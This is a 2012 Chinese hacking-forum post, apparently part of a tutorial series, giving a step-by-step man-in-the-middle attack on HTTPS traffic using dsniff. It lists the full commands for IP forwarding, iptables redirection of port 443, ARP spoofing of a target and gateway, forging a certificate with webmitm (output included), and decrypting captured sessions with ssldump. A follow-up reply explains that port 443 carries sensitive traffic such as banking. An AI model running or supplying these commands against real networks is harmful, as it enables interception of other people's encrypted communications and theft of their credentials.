切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
37: 中间人攻击 dsniff 之 端口欺骗[复制链接]
发表于 2012-8-10 23:16:48 | 显示全部楼层 |!read_mode!
功能就是转发对方SSH SSL到本地
ssldump是一个实时网络通信分析工具,对SSL进行抓包的 先安装他
  1. root@Dis9Team:~# apt-get install dsniff ssldump
复制代码
然后开启IP转发和利用防火墙:
  1. root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
  2. root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
  3. root@Dis9Team:~# iptables -A FORWARD -j ACCEPT
复制代码

用dsniff 的Arpspoof开始网络交换 arpspoof -t 目标 网关
  1. root@Dis9Team:~# arpspoof -t 5.5.5.130 5.5.5.2
复制代码

webmitm 是dsniff 的一个小工具作用是:
webmitm 充当 SSL 代理建立两条 SSL 连接,一条从 ALICE –> EVE,另一条从 EVE –> https://www.yyy.zzz
webmitm 将把 Dsniff 产生的证书发送给 ALICE,这样就能破解这条 SSL 连接的数据了
ALICE 的浏览器同 webmitm 建立 SSL 会话的时候,浏览器会给出告警信息但 ALICE 忽略这些信息接收该证书
webmitm 将从 ALICE 浏览器端发送来的数据解密后呈现给 EVE
开始生成一个证书:
  1. root@Dis9Team:~# webmitm -d
  2. Generating RSA private key, 1024 bit long modulus
  3. ......................................++++++
  4. .......++++++
  5. e is 65537 (0x10001)
  6. You are about to be asked to enter information that will be incorporated
  7. into your certificate request.
  8. What you are about to enter is what is called a Distinguished Name or a DN.
  9. There are quite a few fields but you can leave some blank
  10. For some fields there will be a default value,
  11. If you enter '.', the field will be left blank.
  12. -----
  13. Country Name (2 letter code) [AU]:CN
  14. State or Province Name (full name) [Some-State]:Dis9Team
  15. Locality Name (eg, city) []:TM
  16. Organization Name (eg, company) [Internet Widgits Pty Ltd]:BRK
  17. Organizational Unit Name (eg, section) []:blackrootkit
  18. Common Name (eg, YOUR name) []:brk
  19. Email Address []:blackrootkit@gmail.com

  20. Please enter the following 'extra' attributes
  21. to be sent with your certificate request
  22. A challenge password []:
  23. An optional company name []:
  24. Signature ok
  25. subject=/C=CN/ST=Dis9Team/L=TM/O=BRK/OU=blackrootkit/CN=brk/emailAddress=blackrootkit@gmail.com
  26. Getting Private key
  27. webmitm: certificate generated
  28. webmitm: bind: Address already in use
  29. root@Dis9Team:~#
复制代码
让SSL生效
  1. root@Dis9Team:~# ssldump -n -d -k webmitm.crt | tee log.log
复制代码

这样被嗅探的机子访问443端口的数据全部转发到你本地!
围观37章: 转发的是445端口 利用SMB会话劫持取得SHELL
关于端口在这里设置:
  1. root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
复制代码





操千曲而后晓声,观千剑而后识器。
发表于 2012-8-12 00:59:03 | 显示全部楼层
科普 传送门

443端口即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。
  服务:Https
  说明:网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。在一些对安全性要求较高的网站,比如银行、证券、购物、卡巴斯基激活等,都采用HTTPS服务,这样在这些网站上的交换信息其他人都无法看到,保证了交易的安全性。网页的地址以https://开始,而不是常见的http://。

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:36

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部